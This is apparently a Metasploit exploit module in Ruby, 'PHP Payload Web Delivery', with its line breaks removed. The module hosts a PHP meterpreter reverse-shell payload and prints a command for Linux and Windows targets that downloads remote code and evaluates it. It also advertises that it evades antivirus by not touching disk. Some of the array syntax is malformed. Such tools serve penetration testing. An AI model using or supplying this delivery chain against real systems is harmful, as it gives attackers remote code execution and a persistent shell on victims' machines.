## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super(update_info(info, 'Name' => 'PHP Payload Web Delivery', 'Description' => %q{ This module quickly fires up a web server that serves a PHP payload. The provided command will start PHP and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so is less likely to trigger AV solutions. }, 'License' => MSF_LICENSE, 'Author' => [ 'Andrew Smith "jakx_" ', 'Ben Campbell ' #Idea for module structure ], 'DefaultOptions' => { 'Payload' => 'php/meterpreter/reverse_tcp' }, 'References' => [ [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'] [ 'URL', 'http://us1.php.net/eval'] [ 'URL', 'http://us1.php.net/file_get_contents'] ], 'Platform' => 'php', 'Targets' => [ ['Automatic Targeting', { 'auto' => true }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'N/A')) end def on_request_uri(cli, request) print_status("Delivering Payload") data = %Q|#{payload.encoded} ?>| send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) end def primer url = get_uri() print_status("Run the following command on the target machine:") print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"") print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"") end end